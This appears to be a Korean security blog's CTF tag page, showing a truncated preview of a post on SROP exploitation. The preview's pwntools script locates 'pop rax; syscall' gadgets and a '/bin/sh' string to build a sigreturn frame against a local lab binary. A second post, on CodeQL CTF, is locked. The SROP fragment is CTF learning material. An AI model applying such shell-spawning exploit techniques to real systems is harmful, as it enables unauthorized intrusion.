hack what?

  • 홈
  • 태그
  • 방명록

CTF 2

SROP

SROP ExploitSROP에서 핵심은 "sigreturn system call"이다.해당 system call이 호출될 때, rsp가 가르키는 메모리 영역에 sigcontext 구조체가 위치해야한다.pwntool에서는 SigreturnFrame()를 제공해주고, 거기에 값을 적절히 초기화해서 사용하면 된다. from pwn import *context.arch = 'amd64'p = process('./srop')elf = ELF('./srop')gadget = next(elf.search(asm('pop rax; syscall')))syscall = next(elf.search(asm('syscall')))binsh = '/bin/sh\x00'bss = elf.bss()frame = Sigretur..

Security & Hacking 2025.01.11

CodeQL CTF 정리

보호되어 있는 글입니다.

Security & Hacking 2025.01.01
이전
1
다음
더보기
프로필사진

hack what?

The simpler, The better.

  • 분류 전체보기 (14)
    • Development (2)
    • Security & Hacking (11)
    • Book (1)

Tag

Exploit, srop, Static Analysis, angr, CTF, git, codeql, sysprog, Command Injection, llvm, OOP, rehosting, Embedded, Polymorphism, Fuzzing, VCS, hacking, Android, Book, ssl stripping,

최근글과 인기글

  • 최근글
  • 인기글

최근댓글

공지사항

페이스북 트위터 플러그인

  • Facebook
  • Twitter

Archives

Calendar

«   2025/05   »
일 월 화 수 목 금 토
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

방문자수Total

  • Today :
  • Yesterday :

Copyright © Kakao Corp. All rights reserved.

티스토리툴바